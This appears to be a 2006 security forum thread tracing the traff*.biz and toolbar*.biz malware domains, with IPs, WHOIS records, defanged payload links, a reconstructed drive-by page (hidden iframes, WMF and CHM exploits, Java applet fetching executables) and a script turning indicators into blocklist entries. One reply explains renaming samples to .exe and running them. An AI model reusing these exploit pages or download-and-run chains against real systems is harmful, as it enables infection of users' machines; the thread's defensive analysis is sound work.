Full Version: traffweb.biz | toolbarbest.biz hijacks
Moore
Found a few interesting hijacks today, please don't follow any of these links.

in order of appearance :

QUOTE
.www. icoocash.com 38.113.207.59
iframe.adultfriendfinder.com 64.156.213.198
images.streamray.com 64.156.213.227
toolbarmoney.biz 85.249.23.117
traffweb.biz 85.249.23.119


8 domains found on traffweb.biz = 85.249.23.119

CODE
www.Traffbest.biz
.www.Traffbucks.biz
.www.Traffcool.biz
.www.Traffdollars.biz
.www.Traffmoney.biz
.www.Traffnew.biz
.www.Traffsale1.biz
.www.Traffweb.biz


QUOTE
Domain Name:                                 TRAFFWEB.BIZ
Domain ID:                                   D12386987-BIZ
Sponsoring Registrar:                        TLDS INC.
Sponsoring Registrar IANA ID:                320
Domain Status:                               clientTransferProhibited
Registrant ID:                               6511608-SRSPLUS
Registrant Name:                             Jason Coffman
Registrant Organization:                     Private person
Registrant Address1:                         908 Alder St
Registrant City:                             Philadelphia
Registrant State/Province:                   PA
Registrant Postal Code:                      19147
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.74952171179
Registrant Email:    admin@toolbarbest.biz


toolbarbest.biz = 85.249.23.117

ns1.toolbarbest.biz = 85.249.23.115
ns2.toolbarbest.biz = 85.249.23.116

QUOTE
domains found on 85.249.23.117

www .Iframecash.biz
www .Toolbarbest.biz
www .Toolbarbucks.biz
www .Toolbarcool.biz
www .Toolbardollars.biz
www .Toolbarmoney.biz
www .Toolbarnew.biz
www .Toolbarsale.biz
www .Toolbarweb.biz



QUOTE
Domain Name:                                 TOOLBARBEST.BIZ
Domain ID:                                   D11890133-BIZ
Sponsoring Registrar:                        TLDS INC.
Sponsoring Registrar IANA ID:                320
Domain Status:                               clientTransferProhibited
Registrant ID:                               6488994-SRSPLUS
Registrant Name:                             Alexander Pushkin
Registrant Organization:                     Home Home
Registrant Address1:                         Pushkina str. - 1 - 1
Registrant City:                             Moscow
Registrant Postal Code:                      123456
Registrant Country:                          Russian Federation
Registrant Country Code:                     RU
Registrant Phone Number:                     +78.462788201
Registrant Email:admin@newtoolbar.biz



logged this a bit later while the computer was idle lol ?

QUOTE
12:35:20 AM  update.firefoxupdatecenter.net New record 64.71.167.118
12:35:21 AM ftp.icq.com New record 207.200.66.53
12:35:41 AM www.getlotto.net New record 69.57.146.81
12:36:47 AM www.viagra.com New record 63.236.70.136
12:36:51 AM www.cocaine.org New record 195.82.124.124
12:46:53 AM www.answers.com New record 208.39.44.164



More update.firefoxupdatecenter.net details:
http://www.short-media.com/forum/showthread.php?t=43066

-----------------------------------------------

Assorted links involved in this hijack and some others I collected on the way :

QUOTE
http://85.255.113.10/favicon.ico
http ://85.255.113.10/?to=nan99&from=in
http ://85.255.113.22/inc/nan99.html
hxxp ://85.255.113.10/?to=uncle6&from=in
hxxp ://85.255.113.22/inc/uncle6.html
hxxp ://69.50.190.131/?to=HANGMANIO&from=beli&type=beli
http ://69.50.176.174/ts/in.cgi?ad13&nisha
hxxp ://216.255.186.77/split.php?id=hangall
hxxp ://85.255.113.22/inc/thangall.html
hxxp ://toolbarmoney.biz/dl/adv645.php

hxxp ://traffweb.biz/dl/xpladv799.wmf - shite

hxxp ://traffweb.biz/dl/fillmemadv799.htm
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/java.jar
hxxp ://traffweb.biz/dl/bag.htm
hxxp ://traffweb.biz/dl/error.php - iframe loads hijack


error.php

QUOTE
html
body

iframe src= xpladv799.wmf  width=1 height=1 iframe
applet archive="java.jar" code=" GetAccess.class " width=1 height=1

param name="ModulePath"
value="hxxp:// traffweb.biz/dl/loaderadv799_2.exe
applet>

iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe
iframe width=1 height=1 border=0 frameborder=0
src=fillmemadv799.htm iframe
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm>/iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>
iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm><iframe>
iframe width=1 height=1 border=0 frameborder=0 src=bag.htm
iframe

applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter 

APPLET

SCRIPT LANGUAGE=JavaScript

obj = object data= \ ms-its : mhtml:file
obj1 =  :// C: \\ nosuch.mht ! hxxp:// traffweb.biz/dl/adv799/ x. chm :: / x. htm \ type= \ text/x-scriptlet\
object
document.write(obj+obj1)
script
body
html


inside loaderadv799.jar is matrix.class containing:

QUOTE
java/net/URL hxxp://traffweb.biz/dl/loaderadv799_4.exe
\loadnew.exe java/lang/String hxxp://traffweb.biz/dl/cheat.php?adv=adv799


hxxp ://traffweb.biz/dl/loaderadv799_4.exe
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799

Loadnew.exe hxxp ://traffweb.biz/progs/secure32.php
Loadnew.exe hxxp ://traffweb.biz/progs/paytime.txt
Loadnew.exe hxxp ://traffweb.biz/progs/toolbar.txt
Loadnew.exe hxxp ://traffweb.biz/progs/tool1.txt

--

hxxp://traffweb.biz/progs/toolbar.txt = toolbar.exe

code inside toolbar.exe contains :

QUOTE
Click here to agree this download...

hxxp://eula.dollarrevenue.com/eula.asp?id=103


-----

hxxp ://traffweb.biz/progs/paytime.txt = paytime.exe

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack\march\\trafficbiz\\paytime.rar/paytime.exe (StartPage.148)

QUOTE
CompanyName: Microsoft Corporation
FileDescription: explorer
FileVersion: 2,5,1,1600
InternalName: explorer
LegalCopyright: Copyright Microsoft Corporation ? 2005
LegalTrademarks:
OriginalFilename: explorer.exe
PrivateBuild:
ProductName: explorer helper


-----

-

hxxp://traffweb.biz/progs/secure32.php - desktop wallpaper hijack

TrojanHunter = Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\hijack march\\trafficbiz\\secure32.html (Harnig.103)





--

hxxp://traffweb.biz/favicon.ico
hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp://traffweb.biz/progs/tool2.txt - tool2.exe
hxxp://traffweb.biz/progs/tool3.txt - tool3.exe




hxxp://traffweb.biz/progs/country.php - country.htm / country.exe

-

Loadnew.exe runs hxxp://traffweb.biz/progs/tool2.txt

TDS-3 Positive identification: TrojanDropper.Win32.Small.abm
File:c:\documentsandsettings\spywarekiller\desktop\hijack\march\trafficbiz\loadnew.exe

loadnew.exe
loaderadv799.jar
kl1.exe
uniq


----

More info here:
http://www.bleedingsnort.com/forum/viewtop...&showtopic=1671

Great analysis here :
http://www.wilderssecurity.com/showthread.php?p=693007


back soon with full scans, logs and yes pictures too.

--
fe_de_7
Well done man!
TeMerc
Some cool stuff no doubt.

For giggles and grins I decided to go to a bunch of those to see what would happen.

My test box has XPSP2, fully patched w/ Spy Sweeper, WinPatrol, ZA and AntiVir.

Uninstalled hosts file and IE-SPYAD.

SS and SiteAdvisor, both blocked access to several of those sites so I disabled them as well.

Running InCtrl now will post back if anything is found.
Moore
Hey that's the spirit TeMerc, LOL.. did you notice any other sites not listed here at all?
TeMerc
Sorry for the long delay in replying back to this topic.

Got involved with another box I'm kinda repairing for a friend.

But anyway, after going to these sites and trying to get InCtrl log, the box froze and I lost the info.

Regardless, I ran all the scanners and log generators and nothing was found. Granted this is on a fully patched XP SP2 box but it's always interesting to me that users who are patched, even with minimal or no security, aside from av and fw can still come out clean when visiting some of these sites.

I hope to be getting another box fixed up soon so I can do some more testing and malware type fun stuff. And that box will be a 'sacrificial lamb' as the case may be, with no patches to get the full effect.

Will report back here when that happens.
Webhelper
QUOTE (TeMerc @ Mar 27 2006, 05:20 PM)
Sorry for the long delay in replying back to this topic.

Got involved with another box I'm kinda repairing for a friend.

But anyway, after going to these sites and trying to get InCtrl log, the box froze and I lost the info.

Regardless, I ran all the scanners and log generators and nothing was found. Granted this is on a fully patched XP SP2 box but it's always interesting to me that users who are patched, even with minimal or no security, aside from av and fw can still come out clean when visiting some of these sites.

I hope to be getting another box fixed up soon so I can do some more testing and malware type fun stuff. And that box will be a 'sacrificial lamb' as the case may be, with no patches to get the full effect.

Will report back here when that happens.

At this group's sites, they run a wmf and chm exploit to run a loader file. You would need to get their installer and run it to get the full effect. Or you can download from their wwise.biz site all the *.txt and rename them to *.exe and then run their individual installers:



For the traff4all.biz aka game4all.biz you would run any of their win32.exe :


Have fun:
webhelper
Moore
I wonder what you've been up to lately .. thanks Webhelper, great stuff as always..
Webhelper
QUOTE (Moore @ Mar 7 2006, 03:17 PM)
Found a few interesting hijacks today, please don't follow any of these links.

We will need to update this as this group is now using a new format for their distribution of their trojan installers. They have two main new folders and folders with gibberish type names and files that look random named with no extensions but when downloaded along with their standard tool#.txt, ms1.txt, etc and their MD5s pretty much match each other.

The following are the sites we will need to get installs from to get enough sampling data to see what transmissions show and then again a week later to see if the naming conventions are random or static for each.

Right now it is only the traff*.biz sites that are starting to put together their new format but I have a feeling it won't be long till the rest starts up also.

I will have more on this in the next couple of days so I know exactly what they are doing with the new format and file naming formats. The end result would still show the tool#.exe and other files, however, they are placing them into the root of C:, Program Files root, and in the windows and system folders and loading a large number of temp files as a process.

Moore
Thanks..

Added their new IP to the blocklist and looks like Kim's already added the sites to the Hosts file.

9 domains found on 85.249.19.122

Will see if I can get some samples tonight.
Bronxie
Now then! Hey, I was just wondering how the hell do u manage to gather all this ace info regarding Bad Ars sites? Well, keep it up anyway!!

1 other Q? Do you know when ur explaining some addresses where some of the pages have malicious codes on?

eg! hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp ://traffweb.biz/dl/cheat.php?adv=adv799 .. etc!! Well, I was wondering can you copy and paste these lines and other similar lines into say my own ipfilter.p2p file and will protowall or PG2 block them or do I have to convert them into actual IP addresses?
firstaid
Most findings come from investigating and reporting of logs of boxes that have suspected Malware on them.

Most of these go into the Hosts file, that way you know they are not gonna connect to you. If you do not run a Hosts file for blocking I think you should consider it. All these bad guys get added to it, and once set up correctly you do not even notice it running. Check it out in the Hosts section of the forum. And also look into installing the Hosts file Manager if you have not. Make sure you read about turning DNS services off on your box if you do.

And to answer your other Question, you could copy and paste these into something and get their IP into protowall, but I think most are in already. Most get put in the spyware list. http://www.bluetack.co.uk/config/spyware.txt

firstaid
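
Added example (not from any poster in this thread): a Python script for the conversion asked about above, turning pasted defanged links into hosts-file entries and the `label:start-end` range lines used by PeerGuardian-style `.p2p` lists. The sample input is constructed in the style of this thread, the `thread-indicators` label and the function names are assumptions, and only IPs that already appear in the pasted text are emitted (no DNS lookups are made).

```python
import ipaddress
import re

# Constructed sample in the style of this thread: defanged "hxxp ://" links,
# split "www ." names, and "host = ip" / "ip host" notes.
SAMPLE = """\
hxxp ://traffweb.biz/dl/loaderadv799.jar
hxxp://traffweb.biz/progs/tool1.txt - tool1.exe
hxxp ://toolbarmoney.biz/dl/adv645.php
hxxp ://85.255.113.22/inc/nan99.html
www .Toolbarbest.biz
toolbarbest.biz = 85.249.23.117
85.249.23.119 traffmoney1.biz
"""

# Scheme may be defanged (hxxp) and separated from "://" by a space.
URL_RE = re.compile(r"h(?:tt|xx)ps?\s*://\s*([^/\s?#]+)", re.I)
HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")


def _is_ipv4(token):
    try:
        ipaddress.IPv4Address(token)
        return True
    except ValueError:
        return False


def extract(text):
    """Return (hostnames, ipv4s) from indicator lines; paths are discarded."""
    hosts, ips = set(), set()
    for raw in text.splitlines():
        line = raw.strip()
        match = URL_RE.search(line)
        if match:
            tokens = [match.group(1)]  # only the authority part of the link
        else:
            # Rejoin "www .name" / ".www.name", then split "host = ip" notes.
            line = re.sub(r"^\.?www\s*\.\s*", "www.", line, flags=re.I)
            tokens = re.split(r"[\s=]+", line)
        for token in tokens:
            token = token.lower().strip(".")
            if _is_ipv4(token):
                ips.add(token)
            elif HOST_RE.fullmatch(token):
                hosts.add(token)
    return hosts, ips


def hosts_lines(hosts):
    """Hosts files match exact names, so emit the bare and www. forms."""
    names = set()
    for host in hosts:
        bare = host[4:] if host.startswith("www.") else host
        names.update((bare, "www." + bare))
    return ["0.0.0.0 " + name for name in sorted(names)]


def p2p_lines(ips, label="thread-indicators"):
    """One single-address range per IP in 'label:start-end' (P2P text) form."""
    ordered = sorted(ips, key=ipaddress.IPv4Address)
    return [f"{label}:{ip}-{ip}" for ip in ordered]


if __name__ == "__main__":
    found_hosts, found_ips = extract(SAMPLE)
    print("\n".join(hosts_lines(found_hosts)))
    print("\n".join(p2p_lines(found_ips)))
```

A hostname that is never paired with an address in the pasted text produces only a hosts-file entry; an IP-range list cannot cover it until the address is known.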
Bronxie
good work lads! by the way u can use all the links in avast url web blocker! which adds even more security in case any1 stumble across these sites!
Webhelper
QUOTE (Bronxie @ Apr 14 2006, 10:34 PM)
good work lads! by the way u can use all the links in avast url web blocker! which adds even more security in case any1 stumble across these sites!

blocking is for the general internet public. I for one can not afford to be blocked or you wouldn't read the files I write about
Webhelper
They are on the move again since the weekend.

Active New
85.249.23.119 traffmoney1.biz
85.249.23.119 traffnew1.biz
85.249.23.119 traffweb1.biz

Replaced, Now Inactive
85.249.23.119 traffmoney.biz
85.249.23.119 traffnew.biz
85.249.23.119 traffweb.biz

I give them a few days more and we will probably see these go inactive and new ones with a 1 in the domain name.
85.249.23.119 traffbest.biz
85.249.23.119 traffbucks.biz
85.249.23.119 traffcool.biz
85.249.23.119 traffdollars.biz
Kimberly
Thanks for letting us know Webhelper, I'll check out which are listed and which ain't. The IP remains the same for the lists, but I have to check the hosts file tho.